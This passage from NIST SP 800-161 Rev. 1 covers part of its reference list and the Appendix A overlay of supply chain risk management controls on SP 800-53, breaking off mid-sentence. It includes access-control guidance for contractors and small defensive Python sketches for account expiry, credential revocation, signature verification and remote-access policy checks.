Developing Cyber Resilient Systems: A Systems Security Engineering Approach.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-160, Vol. 2, Rev. 1. https://doi.org/10.6028/NIST.SP.800-160v2r1
[NIST SP 800-171 Rev. 2] Ross RS, Pillitteri VY, Dempsey KL, Riddle M, Guissanie G (2020)
Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-171, Rev. 2, Includes updates as of January 28, 2021.
https://doi.org/10.6028/NIST.SP.800-171r2
[NIST SP 800-172] Ross RS, Pillitteri VY, Guissanie G, Wagner R, Graubart R, Bodeau D
(2021) Enhanced Security Requirements for Protecting Controlled Unclassified
Information: A Supplement to NIST Special Publication 800-171. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-172.
https://doi.org/10.6028/NIST.SP.800-172
[NIST SP 800-181 Rev. 1] Petersen R, Santos D, Wetzel KA, Smith MC, Witte GA (2020)
Workforce Framework for Cybersecurity (NICE Framework). (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-181,
Rev. 1. https://doi.org/10.6028/NIST.SP.800-181r1
[NIST SSDF] National Institute of Standards and Technology (2022) NIST Secure Software
Development Framework. Available at https://csrc.nist.gov/projects/ssdf
[NISTIR 7622] Boyens JM, Paulsen C, Bartol N, Shankles S, Moorthy R (2012) Notional Supply
Chain Risk Management Practices for Federal Information Systems. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Interagency or Internal Report (IR)
7622. https://doi.org/10.6028/NIST.IR.7622
[NISTIR 8179] Paulsen C, Boyens JM, Bartol N, Winkler K (2018) Criticality Analysis Process
Model: Prioritizing Systems and Components. (National Institute of Standards and
Technology, Gaithersburg, MD), NIST Interagency or Internal Report (IR) 8179.
https://doi.org/10.6028/NIST.IR.8179
[NISTIR 8276] Boyens J, Paulsen C, Bartol N, Winkler K, Gimbi J (2021) Key Practices in
Cyber Supply Chain Risk Management: Observations from Industry. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Interagency or Internal Report (IR)
8276. https://doi.org/10.6028/NIST.IR.8276
[NISTIR 8286] Stine KM, Quinn SD, Witte GA, Gardner RK (2020) Integrating Cybersecurity
and Enterprise Risk Management (ERM). (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Interagency or Internal Report (IR) 8286.
https://doi.org/10.6028/NIST.IR.8286
[NTIA SBOM] National Telecommunications and Information Administration and Department of
Commerce (2021) The Minimum Elements For a Software Bill of Materials (SBOM). Available at
https://www.ntia.doc.gov/files/ntia/publications/sbom_minimum_elements_report.pdf
[OMB A-123] Office of Management and Budget (2004) Management’s Responsibility for
Internal Control. (The White House, Washington, DC), OMB Circular A-123, December
21, 2004. Available at https://georgewbush-
whitehouse.archives.gov/omb/circulars/a123/a123_rev.html
[OMB A-130] Office of Management and Budget (2016) Managing Information as a Strategic
Resource. (The White House, Washington, DC), OMB Circular A-130, July 28, 2016.
Available at
https://obamawhitehouse.archives.gov/sites/default/files/omb/assets/OMB/circulars/a130/a
130revised.pdf
[SAFECode 1] Software Assurance Forum for Excellence in Code (2010) Software Integrity
Controls: An Assurance-Based Approach to Minimizing Risks in the Software Supply
Chain. Available at
http://www.safecode.org/publications/SAFECode_Software_Integrity_Controls0610.pdf
[SAFECode 2] Software Assurance Forum for Excellence in Code (2009) The Software Supply
Chain Integrity Framework: Defining Risks and Responsibilities for Securing Software in
the Global Supply Chain. Available at
http://www.safecode.org/publication/SAFECode_Supply_Chain0709.pdf
[SwA] Polydys ML, Wisseman S (2008) Software Assurance in Acquisition: Mitigating Risks to
the Enterprise. A Reference Guide for Security-Enhanced Software Acquisition and
Outsourcing. (National Defense University Press, Washington, D.C.) Information
Resources Management College Occasional Paper. Available at
https://apps.dtic.mil/dtic/tr/fulltext/u2/a495389.pdf
APPENDIX A: C-SCRM SECURITY CONTROLS 35
C-SCRM CONTROLS INTRODUCTION
NIST defines security controls as:
The management, operational, and technical controls (i.e., safeguards or
countermeasures) prescribed for an information system to protect the
confidentiality, integrity, and availability of the system and its information. [FIPS
199]
[NIST SP 800-53, Rev. 5] defines numerous cybersecurity supply chain-related controls within
the catalog of information security controls. This section is structured as an enhanced overlay of
[NIST SP 800-53, Rev. 5]. It identifies and augments C-SCRM-related controls with additional
supplemental guidance and provides new controls as appropriate. The C-SCRM controls are
organized into the 20 control families of [NIST SP 800-53, Rev. 5]. This approach facilitates use
of the security controls assessment techniques articulated in [NIST SP 800-53A, Rev. 5] to
assess implementation of C-SCRM controls.
The controls provided in this publication are intended for enterprises to implement internally and
to require of their contractors and subcontractors if and when applicable and as articulated in a
contractual agreement. As with [NIST SP 800-53, Rev. 5], the security controls and control
enhancements are a starting point from which controls/enhancements may be removed, added, or
specialized based on an enterprise’s needs. Each control in this section is listed for its
applicability to C-SCRM. Those controls from [NIST SP 800-53, Rev. 5] not listed are not
considered directly applicable to C-SCRM and, thus, are not included in this publication. Details
and supplemental guidance for the various C-SCRM controls in this publication are contained in
Section 4.5.
C-SCRM CONTROLS SUMMARY
During the Respond step of the risk management process articulated in Section 2, enterprises
select, tailor, and implement controls for mitigating cybersecurity risks throughout the supply
chain. [NIST SP 800-53B] lists a set of information security controls at the [FIPS 199] high-,
moderate-, and low-impact levels. This section describes how these controls help mitigate risk to
information systems and components, as well as the supply chain infrastructure. The section
provides 20 C-SCRM control families that include relevant controls and supplemental guidance.
Figure A-1 depicts the process used to identify, refine, and add C-SCRM supplemental guidance
to the [NIST SP 800-53, Rev. 5] C-SCRM-related controls and represents the following steps:
1. Select and extract individual controls and enhancements from [NIST SP 800-53, Rev. 5]
applicable to C-SCRM.
2. Analyze these controls to determine how they apply to C-SCRM.
35 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
3. Evaluate the resulting set of controls and enhancements to determine whether all C-
SCRM concerns were addressed.
4. Develop additional controls currently undefined in [NIST SP 800-53, Rev. 5].
5. Identify controls for flow down to relevant sub-level contractors.
6. Assign applicable levels to each C-SCRM control.
7. Develop C-SCRM-specific supplemental guidance for each C-SCRM control.
Fig. A-1: C-SCRM Security Controls in NIST SP 800-161, Rev. 1
[Figure: the overlay extracts NIST SP 800-53, Rev. 5 security controls relevant to C-SCRM and adds
supplemental guidance; the enhanced overlay provided in this appendix additionally adds new controls,
yielding control family descriptions, individual control titles and descriptions, and supplemental
guidance.]
Note that [NIST SP 800-53, Rev. 5] provides C-SCRM-related controls and control families.
These controls may be listed in this publication with a summary or additional guidance and a
reference to the original [NIST SP 800-53, Rev. 5] control and supplemental guidance detail.
C-SCRM CONTROLS THROUGHOUT THE ENTERPRISE
As noted in Table A-1, C-SCRM controls in this publication are designated by the three levels
comprising the enterprise. This is to facilitate the selection of C-SCRM controls specific to
enterprises, their various missions, and individual systems, as described in Appendix C under the
Respond step of the risk management process. During controls selection, enterprises should use
the C-SCRM controls in this section to identify appropriate C-SCRM controls for tailoring per
risk assessment. By selecting and implementing applicable C-SCRM controls for each level,
enterprises will ensure that they have appropriately addressed C-SCRM.
APPLYING C-SCRM CONTROLS TO ACQUIRING PRODUCTS AND SERVICES
Acquirers may use C-SCRM controls as the basis from which to communicate their C-SCRM
requirements to different types of enterprises that provide products and services to acquirers,
including suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers. Acquirers should avoid using generalized requirements
statements, such as “ensure compliance with NIST SP 800-161, Rev. 1 controls.” Acquirers must
be careful to select the controls relevant to the specific use case of the service or product being
acquired. Acquirers are encouraged to integrate C-SCRM throughout their acquisition activities.
More detail on the role of C-SCRM in acquisition is provided in Section 3.1 of this document.
It is important to recognize that the controls in this section do not provide specific contracting
language. Acquirers should use this publication as guidance to develop their own contracting
language with specific C-SCRM requirements for inclusion. The following sections expand upon
the supplier, developer, system integrator, external system service provider, and other ICT/OT-
related service provider roles with respect to C-SCRM expectations for acquirers.
Enterprises may use multiple techniques to ascertain whether these controls are in place, such as
supplier self-assessment, acquirer review, or third-party assessments for measurement and
adherence to the enterprise’s requirements. Enterprises should first look to established third-party
assessments to see if they meet their needs. When an enterprise defines C-SCRM requirements, it
may discover that established third-party assessments may not address all specific requirements.
In this case, additional evidence may be needed to justify unaddressed requirements. Please note
that the data obtained for this purpose should be appropriately protected.
SUPPLIERS
Suppliers may provide either commercial off-the-shelf (COTS) or, in federal contexts,
government off-the-shelf (GOTS) solutions to the acquirer. COTS solutions include non-
developmental items (NDI), such as commercially licensed solutions/products. GOTS solutions
are government-only licensable solutions. Suppliers are a diverse group that ranges from very
small to large, specialized to diversified, and based in a single country to transnational. Suppliers
also range widely in their level of sophistication, resources, and transparency/visibility into their
processes and solutions.
Suppliers have diverse levels and types of C-SCRM practices in place. These practices and other
related practices may provide the requisite evidence for SCRM evaluation. An example of a
federal resource that may be leveraged is the Defense Microelectronics Activity (DMEA)
accreditation for trusted suppliers. When appropriate, allow suppliers the opportunity to reuse
any existing data and documentation that may provide evidence of C-SCRM implementation.
Enterprises should consider whether the cost of doing business with suppliers may be directly
impacted by the extent of supply chain cybersecurity requirements imposed on suppliers, the
willingness or ability of suppliers to allow visibility into how their products are developed or
manufactured, and how they apply security and supply chain practices to their solutions. When
enterprises or system integrators require greater levels of transparency from suppliers, they must
consider the possible cost implications of such requirements. Suppliers may opt not to participate
in procurements to avoid increased costs or perceived risks to their intellectual property, limiting
an enterprise’s supply or technology choices. Additionally, suppliers may face risks from
customers imposing multiple and different sets of supply chain cybersecurity requirements with
which the supplier must comply on a per-customer basis. The amount of transparency required
from suppliers should be commensurate to the suppliers’ criticality, which is sufficient to address
inherent risk.
DEVELOPERS AND MANUFACTURERS
Developers and manufacturers are personnel that develop or manufacture systems, system
components (e.g., software), or system services (e.g., Application Programming Interfaces
[APIs]). Development can occur internally within enterprises or through external entities.
Developers typically maintain privileged access rights and play an essential role throughout the
SDLC. The activities they perform and the work they produce can either enhance security or
introduce new vulnerabilities. It is therefore essential that developers are both subject to and
intimately familiar with C-SCRM requirements and controls.
SYSTEM INTEGRATORS
System integrators provide customized services to the acquirer, including custom development,
test, operations, and maintenance. This group usually replies to a request for proposal from an
acquirer with a solution or service that is customized to the acquirer’s requirements. Such
proposals provided by system integrators can include many layers of suppliers and teaming
arrangements with other vendors or subcontractors. The system integrator should ensure that
these business entities are vetted and verified with respect to the acquirer’s C-SCRM
requirements. Because of the level of visibility that can be obtained in the relationship with the
system integrator, the acquirer has the discretion to require rigorous supplier acceptance criteria
and any relevant countermeasures to address identified or potential risks.
EXTERNAL SYSTEM SERVICE PROVIDERS OF INFORMATION SYSTEM SERVICES
Enterprises use external service providers to perform or support some of their mission and
business functions [NIST SP 800-53, Rev. 5]. The outsourcing of systems and services creates a
set of cybersecurity supply chain concerns that reduces the acquirer’s visibility into and control
of the outsourced functions. Therefore, it requires increased rigor from enterprises in defining C-
SCRM requirements, stating them in procurement agreements, monitoring delivered services,
and evaluating them for compliance with the stated requirements. Regardless of who performs
the services, the acquirer is ultimately responsible and accountable for the risk to the enterprise’s
systems and data that result from the use of these services. Enterprises should implement a set of
compensating C-SCRM controls to address this risk and work with the mission and business
process owner or risk executive to accept this risk. A variety of methods may be used to
communicate and subsequently verify and monitor C-SCRM requirements through such vehicles
as contracts, interagency agreements, lines of business arrangements, licensing agreements,
and/or supply chain transactions.
OTHER ICT/OT-RELATED SERVICE PROVIDERS
Providers of services can perform a wide range of functions, from consulting to publishing website
content to janitorial services. Other ICT/OT-related service providers encompass those providers
that require physical or logical access to ICT/OT or that use technology (e.g., an aerial
photographer using a drone to take video/pictures or a security firm remotely monitoring a facility
using cloud-based video surveillance) as a means of delivering their service. As a result of service
provider access or use, the potential for cyber supply chain risk being introduced to the enterprise
rises.
Operational technology possesses unique operational and security characteristics that necessitate
the application of specialized skills and capabilities to effectively protect them. Enterprises that
have significant OT components throughout their enterprise architecture often turn to specialized
service providers for the secure implementation and maintenance of these devices, systems, or
equipment. Any enterprise or individual providing services that may include authorized access to
an ICT or OT system should adhere to enterprise C-SCRM requirements. Enterprises should
apply special scrutiny to ICT/OT-related service providers managing mission-critical and/or
safety-relevant assets.
SELECTING, TAILORING, AND IMPLEMENTING C-SCRM SECURITY CONTROLS
The C-SCRM controls defined in this section should be selected and tailored according to
individual enterprise needs and environments using the guidance in [NIST SP 800-53, Rev. 5] in
order to ensure a cost-effective, risk-based approach to providing enterprise-wide C-SCRM. The
C-SCRM baseline defined in this publication addresses the basic needs of a broad and diverse set
of constituents. Enterprises must select, tailor, and implement the security controls based on: (i)
the environments in which enterprise information systems are acquired and operate; (ii) the
nature of operations conducted by enterprises; (iii) the types of threats facing enterprises, mission
and business processes, supply chains, and information systems; and (iv) the type of information
processed, stored, or transmitted by information systems and the supply chain infrastructure.
After selecting the initial set of security controls, the acquirer should initiate the tailoring process
according to NIST SP 800-53B, Control Baselines for Information Systems and Organizations, in
order to appropriately modify and more closely align the selected controls with the specific
conditions within the enterprise. The tailoring should be coordinated with and approved by the
appropriate enterprise officials (e.g., authorizing officials, authorizing official designated
representatives, risk executive [function], chief information officers, or senior information
security officers) prior to implementing the C-SCRM controls. Additionally, enterprises have the
flexibility to perform the tailoring process at the enterprise level (either as the required tailored
baseline or as the starting point for policy-, program-, or system-specific tailoring) in support of
a specific program at the individual information system level or using a combination of
enterprise-level, program/mission-level, and system-specific approaches.
Selection and tailoring decisions, including the specific rationale for those decisions, should be
included within the C-SCRM documentation at Levels 1, 2, and 3 and Appendix C and approved
by the appropriate enterprise officials as part of the C-SCRM plan approval process.
C-SCRM CONTROL FORMAT
Table A-1 shows the format used in this publication for controls providing supplemental C-
SCRM guidance on existing [NIST SP 800-53, Rev. 5] controls or control enhancements.
C-SCRM controls that do not have a parent [NIST SP 800-53, Rev. 5] control generally follow
the format described in [NIST SP 800-53, Rev. 5] with the addition of relevant levels. New
controls are given identifiers consistent with [NIST SP 800-53, Rev. 5] but do not duplicate
existing control identifiers.
Table A-1: C-SCRM Control Format

CONTROL IDENTIFIER  CONTROL NAME
Supplemental C-SCRM Guidance:
Level(s):
Related Control(s):
Control Enhancement(s):
(1)  CONTROL NAME | CONTROL ENHANCEMENT NAME
Supplemental C-SCRM Guidance:
Level(s):
Related Control(s):

An example of the C-SCRM control format is shown below using C-SCRM Control AC-3 and
C-SCRM Control Enhancement AC-3(8):
AC-3
ACCESS ENFORCEMENT
Supplemental C-SCRM Guidance: Ensure that the information systems and the supply chain have
appropriate access enforcement mechanisms in place. This includes both physical and logical access
enforcement mechanisms, which likely work in coordination for supply chain needs. Enterprises should
ensure a detailed definition of access enforcement.
Level(s): 2, 3
Related Control(s): AC-4
Control Enhancement(s):
(8)
ACCESS ENFORCEMENT | REVOCATION OF ACCESS AUTHORIZATIONS
Supplemental C-SCRM Guidance: Prompt revocation is critical to ensure that suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers who
no longer require access or who abuse or violate their access privilege are not able to access an
enterprise’s system. For example, in a “badge flipping” situation, a contract is transferred from one
system integrator enterprise to another with the same personnel supporting the contract. In that
situation, the enterprise should disable the existing accounts, retire the old credentials, establish new
accounts, and issue completely new credentials.
Level(s): 2, 3
USING C-SCRM CONTROLS IN THIS PUBLICATION
The remainder of this appendix provides the enhanced C-SCRM overlay of NIST SP 800-53, Rev. 5.
This section displays the relationship between NIST SP 800-53, Rev. 5 controls and C-SCRM
controls in one of the following ways:
• If a [NIST SP 800-53, Rev. 5] control or enhancement was determined to be an
information security control that serves as a foundational control for C-SCRM but is not
specific to C-SCRM, it is not included in this publication.
• If a [NIST SP 800-53, Rev. 5] control or enhancement was determined to be relevant to
C-SCRM, the levels in which the control applies are also provided.
• If a [NIST SP 800-53, Rev. 5] enhancement was determined to be relevant to C-SCRM
but the parent control was not, then the parent control number and title are included, but
there is no supplemental C-SCRM guidance.
• C-SCRM controls/enhancements that do not have an associated [NIST SP 800-53, Rev.
5] control/enhancement are listed with their titles and the control/enhancement text.
• All C-SCRM controls include the levels for which the control applies and supplemental
C-SCRM guidance as applicable.
• When a control enhancement provides a mechanism for implementing the C-SCRM
control, the control enhancement is listed within the Supplemental C-SCRM Guidance
and is not included separately.
• Withdrawals or reorganizations of prior [NIST SP 800-161] controls that are already captured
in [NIST SP 800-53, Rev. 5] are not repeated in this publication.
The following new controls and control enhancement have been added:
• The C-SCRM Control MA-8 – Maintenance Monitoring and Information Sharing is added to the
Maintenance control family.
• The C-SCRM Control SR-13 – Supplier Inventory is added to the Supply Chain Risk
Management control family.
C-SCRM SECURITY CONTROLS
FAMILY: ACCESS CONTROL
[FIPS 200] specifies the Access Control minimum security requirement as follows:
Organizations must limit information system access to authorized users, processes
acting on behalf of authorized users, devices (including other information systems), and
the types of transactions and functions that authorized users are permitted to exercise.
Systems and components that traverse the supply chain are subject to access by a variety of
individuals and enterprises, including suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. Such access should be defined
and managed to ensure that it does not inadvertently result in the unauthorized release,
modification, or destruction of information. This access should be limited to only the necessary
type, duration, and level of access for authorized enterprises (and authorized individuals within
those enterprises) and monitored for cybersecurity supply chain impact.
AC-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should specify and include in agreements (e.g., contracting
language) access control policies for their suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers. These policies should address both physical and
logical access to the supply chain and the information system. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors.
Level(s): 1, 2, 3
AC-2
ACCOUNT MANAGEMENT
Supplemental C-SCRM Guidance: Use of this control helps establish traceability of actions and actors in
the supply chain. This control also helps ensure that access authorizations of actors in the supply chain are
appropriate on a continuous basis. The enterprise may choose to define a set of roles and associate a level
of authorization to ensure proper implementation. Enterprises must ensure that accounts for contractor
personnel do not exceed the period of performance of the contract. Privileged accounts should only be
established for appropriately vetted contractor personnel. Enterprises should also have processes in place to
establish and manage temporary or emergency accounts for contractor personnel that require access to a
mission-critical or mission-enabling system during a continuity or emergency event. For example, during a
pandemic event, existing contractor personnel who are not able to work due to illness may need to be
temporarily backfilled by new contractor staff. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
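
The period-of-performance requirement above lends itself to automated checking. The following
minimal sketch (in Python, with hypothetical field and contract names) flags contractor accounts
whose expiration is unset or extends past the contract end date; it illustrates one possible approach,
not a prescribed implementation.

    from dataclasses import dataclass
    from datetime import date
    from typing import Iterable, Optional

    @dataclass
    class ContractorAccount:
        # Hypothetical record layout; real directory schemas (e.g., LDAP/AD) differ.
        user_id: str
        contract_id: str
        expires: Optional[date]  # None means no expiration is set

    def accounts_exceeding_performance_period(accounts: Iterable[ContractorAccount],
                                              contract_end: dict):
        """Yield accounts that outlive (or lack) their contract's period of performance."""
        for acct in accounts:
            end = contract_end.get(acct.contract_id)
            if end is None:
                continue  # unknown contract: handle per enterprise policy
            if acct.expires is None or acct.expires > end:
                yield acct

    accounts = [
        ContractorAccount("jdoe", "C-001", date(2026, 1, 31)),    # outlives contract
        ContractorAccount("asmith", "C-001", date(2025, 12, 1)),  # within period
    ]
    for a in accounts_exceeding_performance_period(accounts, {"C-001": date(2025, 12, 31)}):
        print(f"review account {a.user_id}: exceeds contract {a.contract_id}")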
AC-3
ACCESS ENFORCEMENT
Supplemental C-SCRM Guidance: Ensure that the information systems and the supply chain have
appropriate access enforcement mechanisms in place. This includes both physical and logical access
enforcement mechanisms, which likely work in coordination for supply chain needs. Enterprises should
ensure that a defined consequence framework is in place to address access control violations. Enterprises
should require their prime contractors to implement this control and flow down this requirement to relevant
sub-tier contractors. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
ACCESS ENFORCEMENT | REVOCATION OF ACCESS AUTHORIZATIONS
Supplemental C-SCRM Guidance: Prompt revocation is critical to ensure that suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers who
no longer require access or who abuse or violate their access privilege are not able to access an
enterprise’s system. Enterprises should include in their agreements a requirement for contractors and
sub-tier contractors to immediately return access credentials (e.g., tokens, PIV or CAC cards, etc.) to
the enterprise. Enterprises must also have processes in place to promptly revoke access authorizations
(a minimal sketch follows this control). For example, in a “badge flipping” situation, a contract is transferred from one
system integrator enterprise to another with the same personnel supporting the contract. In that
situation, the enterprise should disable the existing accounts, retire the old credentials, establish new
accounts, and issue completely new credentials.
Level(s): 2, 3
ACCESS ENFORCEMENT | CONTROLLED RELEASE
Supplemental C-SCRM Guidance: Information about the supply chain should be controlled for release
between the enterprise and third parties. Information may be exchanged between the enterprise and its
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers. The controlled release of enterprise information protects against risks associated
with disclosure.
Level(s): 2, 3
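
As referenced in the revocation enhancement above, prompt revocation benefits from a predefined,
repeatable sequence. The following minimal sketch (Python, using in-memory stand-ins for an identity
directory and a credential store, both hypothetical) illustrates one way to disable an account, retire
its credentials, and record the action so that the revocation itself is auditable.

    from datetime import datetime, timezone

    class Directory:
        """Minimal in-memory stand-in for an identity directory."""
        def __init__(self):
            self.enabled = {}
        def disable_account(self, user_id):
            self.enabled[user_id] = False

    class CredentialStore:
        """Stand-in for token/PIV/CAC issuance records."""
        def __init__(self):
            self.active = {}
        def retire_credentials(self, user_id):
            self.active[user_id] = []

    def revoke_access(user_id, directory, creds, audit_log):
        # Disable logical access first, then retire issued credentials, and
        # record the action so the revocation itself is auditable (see AU-2).
        directory.disable_account(user_id)
        creds.retire_credentials(user_id)
        audit_log.append({"event": "access_revoked", "user": user_id,
                          "time": datetime.now(timezone.utc).isoformat()})

    # Badge-flipping transition: revoke first, then provision new accounts/credentials.
    d, c, log = Directory(), CredentialStore(), []
    revoke_access("contractor-42", d, c, log)
    print(log[0]["event"])  # access_revoked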
AC-4
INFORMATION FLOW ENFORCEMENT
Supplemental C-SCRM Guidance: Supply chain information may traverse a large supply chain to a broad
set of stakeholders, including the enterprise and its various federal stakeholders, suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers.
Specifying the requirements and how information flow is enforced should ensure that only the required
information is communicated to various participants in the supply chain. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
INFORMATION FLOW ENFORCEMENT | METADATA
Supplemental C-SCRM Guidance: The metadata relevant to C-SCRM is extensive and includes
activities within the SDLC. For example, information about systems and system components,
acquisition details, and delivery is considered metadata and may require appropriate protections.
Enterprises should identify what metadata is directly relevant to their supply chain security and ensure
that information flow enforcement is implemented in order to protect applicable metadata.
Level(s): 2, 3
INFORMATION FLOW ENFORCEMENT | DOMAIN AUTHENTICATION
Supplemental C-SCRM Guidance: Within the C-SCRM context, enterprises should specify various
source and destination points for information about the supply chain and information that flows
through the supply chain. This is so that enterprises have visibility of information flow within the
supply chain.
Level(s): 2, 3
INFORMATION FLOW ENFORCEMENT | VALIDATION OF METADATA
Supplemental C-SCRM Guidance: For C-SCRM, the validation of data and its relationship to its
metadata is critical. Much of the data transmitted through the supply chain is validated by verifying
the associated metadata that is bound to it. Ensure that proper filtering and inspection are put in
place for validation before allowing payloads into the supply chain (a minimal sketch follows this
control).
Level(s): 2, 3
INFORMATION FLOW ENFORCEMENT | PHYSICAL OR LOGICAL SEPARATION OF INFORMATION FLOWS
Supplemental C-SCRM Guidance: The enterprise should ensure the separation of the information
system and supply chain information36 flow. Various mechanisms can be implemented, such as
encryption methods (e.g., digital signing). Addressing information flow between the enterprise and its
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers may be challenging, especially when leveraging public networks.
Level(s): 3
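
The metadata-validation enhancement above can be illustrated concretely. The following sketch
(Python) assumes the third-party pyca/cryptography package and simulates key distribution by
generating a key pair locally; in practice, supplier public keys would be provisioned through an
out-of-band PKI. It verifies that a payload and its bound metadata match the supplier's signature
before either is admitted into the supply chain.

    import hashlib, json
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
    from cryptography.exceptions import InvalidSignature

    def canonical(metadata: dict, payload: bytes) -> bytes:
        # Bind metadata to the payload by embedding the payload digest.
        doc = dict(metadata, payload_sha256=hashlib.sha256(payload).hexdigest())
        return json.dumps(doc, sort_keys=True).encode()

    # Supplier side (normally performed before shipment/transmission):
    supplier_key = Ed25519PrivateKey.generate()
    payload = b"firmware image bytes..."
    metadata = {"component": "ctrl-board", "version": "2.1", "origin": "OEM-X"}
    signature = supplier_key.sign(canonical(metadata, payload))

    # Acquirer side: inspect and validate before accepting the payload.
    public_key = supplier_key.public_key()
    try:
        public_key.verify(signature, canonical(metadata, payload))
        print("metadata verified; payload admitted")
    except InvalidSignature:
        print("reject: metadata/payload do not match signature")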
AC-5
SEPARATION OF DUTIES
Supplemental C-SCRM Guidance: The enterprise should ensure that an appropriate separation of duties is
established for decisions that require the acquisition of both information system and supply chain
components. The separation of duties helps to ensure that adequate protections are in place for components
entering the enterprise’s supply chain, such as denying developers the privilege to promote code that they
wrote from development to production environments. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
36 Supply Chain Cybersecurity Risk Information is defined in the glossary of this document based on the Federal Acquisition Supply Chain
Security Act (FASCSA) definition for the term.
Level(s): 2, 3
AC-6
LEAST PRIVILEGE
Supplemental C-SCRM Guidance: For C-SCRM supplemental guidance, see control enhancements.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Control Enhancement(s):
LEAST PRIVILEGE | PRIVILEGED ACCESS BY NON-ORGANIZATIONAL USERS
Supplemental C-SCRM Guidance: Enterprises should ensure that protections are in place to prevent
non-enterprise users from having privileged access to enterprise supply chain and related supply chain
information. When enterprise users include independent consultants, suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers, relevant
access requirements may need to use least privilege mechanisms to precisely define what information
and/or components are accessible, for what duration, at what frequency, using what access methods,
and by whom. Understanding what components are critical and non-critical can aid in understanding
the level of detail that may need to be defined regarding least privilege access for non-enterprise users.
Level(s): 2, 3
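
The least-privilege dimensions enumerated above (what, for how long, how often, by which access
methods, and by whom) can be captured in a simple grant record. The following minimal sketch
(Python, with hypothetical field names) illustrates one possible encoding; it is not a prescribed
schema.

    from dataclasses import dataclass
    from datetime import datetime, timezone

    @dataclass
    class AccessGrant:
        subject: str                   # by whom: a named individual
        resources: tuple               # what information/components
        not_before: datetime
        not_after: datetime            # duration of the grant
        max_requests_per_day: int      # frequency
        methods: tuple = ("vpn",)      # permitted access methods

        def permits(self, subject, resource, method, when, used_today):
            return (subject == self.subject
                    and resource in self.resources
                    and method in self.methods
                    and self.not_before <= when <= self.not_after
                    and used_today < self.max_requests_per_day)

    grant = AccessGrant("vendor-eng-1", ("build-logs",),
                        datetime(2025, 1, 1, tzinfo=timezone.utc),
                        datetime(2025, 3, 31, tzinfo=timezone.utc),
                        max_requests_per_day=20)
    print(grant.permits("vendor-eng-1", "build-logs", "vpn",
                        datetime(2025, 2, 1, tzinfo=timezone.utc), used_today=3))  # True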
AC-17 REMOTE ACCESS
Supplemental C-SCRM Guidance: Ever more frequently, supply chains are accessed remotely. Whether for
the purpose of development, maintenance, or the operation of information systems, enterprises should
implement secure remote access mechanisms and allow remote access only to vetted personnel. Remote
access to an enterprise’s supply chain (including distributed software development environments) should be
limited to the enterprise or contractor personnel and only if and as required to perform their tasks. Remote
access requirements – such using a secure VPN, employing multi-factor authentication, or limiting access
to specified business hours or from specified geographic locations – must be properly defined in
agreements. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
REMOTE ACCESS | PROTECTION OF MECHANISM INFORMATION
Supplemental C-SCRM Guidance: Enterprises should ensure that detailed requirements are properly
defined and that access to information regarding the information system and supply chain is protected
from unauthorized use and disclosure. Since supply chain data and metadata disclosure or access can
have significant implications for an enterprise’s mission processes, appropriate measures must be taken
to vet both the supply chain and personnel processes to ensure that adequate protections are
implemented. Ensure that remote access to such information is included in requirements.
Level(s): 2, 3
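
The following minimal sketch (Python, with illustrative policy values) shows one way
agreement-defined remote access constraints such as those above (MFA, business hours, permitted
locations) might be evaluated at request time; it is a sketch, not a prescribed mechanism.

    from datetime import datetime, timezone

    POLICY = {
        "require_mfa": True,
        "business_hours_utc": range(13, 22),   # illustrative: 13:00-21:59 UTC
        "allowed_countries": {"US", "CA"},     # illustrative allow-list
    }

    def remote_access_allowed(request: dict, policy: dict = POLICY) -> bool:
        # Each check mirrors a constraint that would be defined in the agreement.
        if policy["require_mfa"] and not request.get("mfa_passed"):
            return False
        if request["time"].hour not in policy["business_hours_utc"]:
            return False
        return request.get("country") in policy["allowed_countries"]

    request = {"user": "contractor-7", "mfa_passed": True, "country": "US",
               "time": datetime(2025, 6, 2, 15, 30, tzinfo=timezone.utc)}
    print(remote_access_allowed(request))  # True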
AC-18 WIRELESS ACCESS
Supplemental C-SCRM Guidance: An enterprise’s supply chain may include wireless infrastructure that
supports supply chain logistics (e.g., radio-frequency identification device [RFID] support, software call
home features). Supply chain systems/components traverse the supply chain as they are moved from one
location to another, whether within the enterprise’s own environment or during delivery from system
integrators or suppliers. Ensuring that appropriate and secure access mechanisms are in place within this
